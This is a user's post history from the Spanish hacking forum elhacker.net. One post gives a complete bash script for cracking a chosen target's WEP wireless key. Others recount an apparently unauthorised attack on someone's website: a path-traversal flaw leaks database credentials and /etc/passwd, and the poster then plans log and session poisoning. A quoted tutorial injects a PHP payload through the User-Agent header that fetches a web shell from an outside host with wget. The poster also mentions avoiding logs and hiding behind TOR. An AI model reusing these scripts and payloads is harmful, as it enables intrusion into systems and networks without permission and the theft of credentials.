elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16]
151  Seguridad Informática / Hacking Wireless / Re: Script sencillo para hackear claves WEP funcionando. en: 11 Febrero 2010, 09:48 am
Acabo de hacer el código en bash muy rápido y me falta la linea que actualiza la cadena seguro que van cosas mal pero la idea es la que te escribo aqui debajo. Busca un manual de bash.
Despues solo tendrias que concatenar cada linea a la cadena "WLAN":

Código
  1. numDigitos = 13;
  2. contUnidades = 0;
  3. apuntador = 0;
  4. i = "0000000000000";
  5. #Vemos si llegó al final de nuestra cadena de caracteres.
  6. while (( $i -ne "FFFFFFFFFFFFFFF" )) do
  7. if (test ($contUnidades = 15)&($apuntador=13)) then
  8.     contUnidades=0;
  9.     apuntador = 0;
  10. # Vemos si hay que pasar a un dígito de mayor peso
  11. elif($contUnidades=15) then
  12.    apuntador++;
  13. fi;
  14.  
  15. #FALTA HACER ESTO AQUI->>>>Sumamos uno a la posicion i de nuestra cadena
  16.  
  17. #Almacenar
  18. cat i > diccionario.txt
  19. done
  20.  

ChimoC me ha corregido un detalle y yo he corregido las variables que debían llevar $ delante, seguro que hay mas errores pero viendo por un tuto de bash scripting el código lo puedes terminar sin problemas, cualquier duda posteala por aqui pero googlea antes de preguntar.

Un saludo, espero que te sirva
152  Seguridad Informática / Hacking Wireless / Re: Script sencillo para hackear claves WEP funcionando. en: 11 Febrero 2010, 09:35 am
numDigitos = 13;
contUnidades = 0;
apuntador = 0;
i = "0000000000000";
while (( i -eq "FFFFFFFFFFFFFFF" )) do
if (test (contUnidadades = 15)&(numDigitos=13)) then
     contUnidades=0;
     numDigitos = 0;

     
     if (apuntador=13)
     #apuntar

cat i > diccionario.txt
done
153  Seguridad Informática / Hacking Wireless / Script sencillo para hackear claves WEP funcionando. en: 10 Febrero 2010, 11:21 am
Acabo de realizar un script para Hackear las redes wireles como alternativa al airoscript o similares.
El mío es más sencillo, sin llamadas a métodos. Os lo dejo por aquí:

Código
  1. #! /bin/bash
  2. #Script wifihack por snakingmax.
  3. sudo rm -r /tmp/wifihack/
  4. sudo mkdir /tmp/wifihack/
  5.  
  6. # PASO 0 - ACTIVAR EL DRIVER MONITOR:
  7. sudo airmon-ng stop mon0;
  8. sudo airmon-ng start wlan0;
  9.  
  10. # PASO 0.1 - PONERME UNA MAC FALSA. Fabada mola xD
  11. sudo ifconfig mon0 down;
  12. sudo macchanger --mac=00:FA:BA:DA:CA:BE mon0
  13. sudo ifconfig mon0 up;
  14.  
  15. # PASO 1 - LISTAR LAS WIFIS:
  16. xterm -title "Detectando wifis (paralo cuando quieras)." -e sudo airodump-ng mon0 -w "/tmp/wifihack/wifiList";
  17. cat /tmp/wifihack/wifiList-01.kismet.netxml | grep -e 'essid' -e 'BSSID'  -e 'channel' -e 'encryption' > /tmp/wifihack/wifis |
  18. firefox "/tmp/wifihack/wifis";
  19.  
  20. # Un inciso para preguntar:
  21. j="n";
  22. while test $j != "s"
  23. do
  24. clear;
  25. echo Dime el canal del punto de acceso:
  26. read canal
  27. echo Dime la mac del router del objetivo:
  28. read MAC_OBJETIVO
  29. echo Dime el nombre de la wifi del objetivo:
  30. read NOMBRE_AP
  31. echo "¿Estás seguro de que lo has escrito bien (s/n)?"
  32. read j
  33. done
  34. echo Vamos a empezar con el proceso entonces.
  35.  
  36. # PASO 2 - PONER EL AIRODUMP:
  37. xterm -hold  -title "Pinchando la conexión del objetivo" -e sudo airodump-ng -c $canal -w /tmp/wifihack/captura mon0 &
  38.  
  39. # PASO 3 - HACERSE AMIGO DEL ROUTER DEL OBJETIVO:
  40. # e inyectar algo de tráfico cada 5 segundos.
  41. xterm -hold -title "Me estoy haciendo amigo del router del objetivo" -e "for (( i=0; i<=1000; i++ )) do sudo aireplay-ng -1 0 -a $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE -e $NOMBRE_AP mon0; sleep 5; done" &
  42.  
  43. # PASO 4 - ESNIFAR ROUTER DEL OBJETIVO:
  44. xterm -hold -title "Almacenando los datos de la conexion pinchada" -e sudo aireplay-ng -3 -b $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE mon0 &
  45.  
  46. # PASO 5 - OBTENER LA CLAVE A PARTIR DE LO QUE ESNIFAMOS:
  47. xterm -hold -title "Pulsa una tecla para intentar crackear" -e "for (( i=0; i<=1000; i++ )) do read a; sudo aircrack-ng -a 1 -s /tmp/wifihack/captura-01.cap; done"
  48.  

Solamente me gustaría que mostrase mejor el archivo: wifiList-01.kismet.netxml
Ese archivo contiene en formato xml la lista de wifis de todos los canales wifi.

Lo que hice es volcar a un archivo usando grep los datos mas interesantes de las wifis que se guardan en bloques que empiezan con el campo <encriptacion> y terminan con el campo <canal>.

Y después abro ese archivo con firefox, si no lo tenéis instalado podéis abrirlo con kate o similares.

Lo interesante sería que el script filtrase también las etiquetas de xml y mostrase los datos algo mas ordenados  :P

Un saludo y gracias a todos por vuestra ayuda.
154  Seguridad Informática / Nivel Web / Re: Vulnerabilidades en PHP en: 17 Octubre 2009, 01:03 am
Gracias a los tres por la ayuda, aunque no fuí capaz de entrar estoy aprendiendo mucho de todo esto, no sabía que el RFI se podía exprimir tanto  ;D

Estoy viendo lo de envenenar sesiones y parece que es muy similar a envenenar los LOGS.
Os lo explico para ver si lo entendí bien, si estoy equivocado corregidme:
Se trata de aprovechar una variable que uno puede pasar como parámetro para que escriba código PHP dentro de un archivo y postreriormente llamarlo con el RFI, ya sean logs o sesiones, lo entendí como "el mismo truco" para las sesiones que para los logs.

En este caso al archivo de sesiones tengo permiso, pero el problema es que ese archivo almacena solo 3 cosas y por lo que veo en el código, no cuenta conmigo para nada:
fecha     hora     ip

Por ejemplo:
13/04/1877      12:23      127.0.0.1

Así que creo que no puedo inyectar nada en ese archivo.
Os dejo el código de la funcion newSes del codigo fuente PHP por si alguien encuentra algo que yo no soy capaz de ver:

   function newSes()
   {

      $fecha = date('d')."/".date('m')."/".date('Y');
      $hora = date('H').":".date('i').":".date('s');
      if (file_exists("../logses/ses.txt"))
                {
         $archivoLog = fopen ("../logses/ses.txt","a");
      }else{
         $archivoLog = fopen ("../logses/ses.txt","w");
      }
      $line = $fecha." \t".$hora." \t ".$this->getIp()." \r\n";
      fputs ($archivoLog,$line);
      fclose($archivoLog);
            
   }
}

Saludos y gracias por vuestra ayuda
155  Seguridad Informática / Nivel Web / Re: Vulnerabilidades en PHP en: 16 Octubre 2009, 08:41 am
Gracias por ofrecerte 0x0309 pero prefiero guardar la URL en privado.
Kamsky muchas gracias, es un buen manual viene todo explicado perfectamente. Lo seguí pero no tengo permiso para acceder a /proc/self/environ
Y gracias también a ti WHK, me informé en un tutorial de cómo se inyecta una shell en los logs y busqué dónde se alojaban en este servidor pero me deniega el acceso a ellos; en este caso estaban en /var/apache2/logs/ o en un directorio similar.

Parece que no se puede sacar mas provecho a esta vulnerabilidad, tengo que buscar otras.
Si consigo algún logro ya os lo comento por aquí  ;D

Por último decir que si a alguien le interesa el videotutorial de lo que me comentó WHK, es decir, el que explica cómo inyectar una shell en los logs de apache puedo subirlo a rapidshare o similares y colocarlo aquí para todos.

Un saludo y gracias por la ayuda
156  Seguridad Informática / Nivel Web / Re: Vulnerabilidades en PHP en: 15 Octubre 2009, 05:52 am
Gracias a todos por la ayuda.
Tienes razón OHK sería mejor que buscase otras vulnerabilidades, tengo acceso al /etc/passwd y eso me dice bastante de las aplicaciones que tiene instaladas. (y de los usuarios todo menos la contraseña, hay que jod¿¡#$1J&)
También tengo acceso a su version de linux y otros datos interesantes para buscar vulnerabiliades nuevas.

Con LFI solo me queda probar algo similar a esto que encontré en google (para conseguir shell remota como dijo Monkito):
-----------------------------------------
Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
    Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
    
      www.website.com/view.php?page=../../../../../proc/self/environ
      
     Choose Tamper and in User-Agent filed write the following code :
    
        <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?>
        
    Then submit the request.
    
     Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini.
-------------------------------------------

Después trataré de buscar nuevas vulnerabilidades como dices OHK.

Braulio23, lo del proxy casi que lo dejo como última opción. De todas maneras gracias braulio23, es bueno tener en cuenta todas las posibilidades, y en último caso podría conectarme haciendo un tunel con la red TOR....
157  Seguridad Informática / Nivel Web / Re: Vulnerabilidades en PHP en: 13 Octubre 2009, 21:06 pm
Monkito, eres un fenómeno!
Acabo de echar un vistazo al my.cnf y dice que:

# localhost which is more compatible and is not less secure.
bind-address      = 127.0.0.1

Así que al menos ya se que me puedo ir olvidando de conectarme remotamente.

Lo del /etc/passwd ya lo había hecho y me devolvió el fichero de contraseñas. Pero no aparece la contraseña porque están en shadow, así que me intenté bajar el fichero shadow pero no me deja (mira tú para qué inventaron el fichero shadow) :-(

Podría intentar conectarme con un cliente FTP y con un usuario de esos por defecto que hay en el /etc/passwd, porque su servidor FTP usa el /etc/passwd para ver si puedes o no conectarte. El problema es que me acojonan los logs del servidor FTP y no me atrevo a entrar;
solo se que no se nada de lo que hay ahí dentro xD.

Supongo que podría hacer una inyeccion php para que me devuelva una shell al servidor, tengo que ver eso, voy a googlear un poco.

Muchas gracias por comentar y dedicarme tu tiempo!! saludos
158  Seguridad Informática / Nivel Web / Vulnerabilidades en PHP en: 18 Julio 2009, 05:35 am
Hola, estoy intentando acceder a una BD SQL. Espero que podáis ayudarme.
POR PASOS:

Entro a la web y encuentro el archivo "descargas.php" con el siguiente codigo:
<?
        $ruta=$HTTP_GET_VARS['dir'];
   
   $enlace = "../directorio/".$ruta;

   header ("Content-Disposition: attachment; filename=".$ruta."\n\n");
   header ("Content-Type: application/octet-stream");
   header ("Content-Length: ".filesize($enlace));
   readfile($enlace);
?>

Con lo cual haciendo:
http://www.servidor.com/descargas.php?dir=../../conectarsql.php

Consigo bajar el código del archivo conectarsql.php:

<?
$dbh=mysql_connect ("localhost", "usuario", "contraseña") or die ('Imposible conectar porque: ' . mysql_error());
mysql_select_db ("basededatos",$dbh);
?>

Ahora ya tengo la base de datos, el usuario y la contraseña.
Hago un ping a www.servidor.com y ya tengo la IP del servidor también.

Y ahora que tengo todo viene la gran pregunta:
¿Cómo me conecto remotamente a esa B.D.?
¿Es posible el acceso remoto a la base de datos SQL?
¿$enlace = "../directorio/".$ruta; todavía me vale para robar algun archivo más que no sea el passwd ni los logs porque no tengo permiso para ello?

Espero que podáis echarme una mano con esto. Gracias
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [16]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines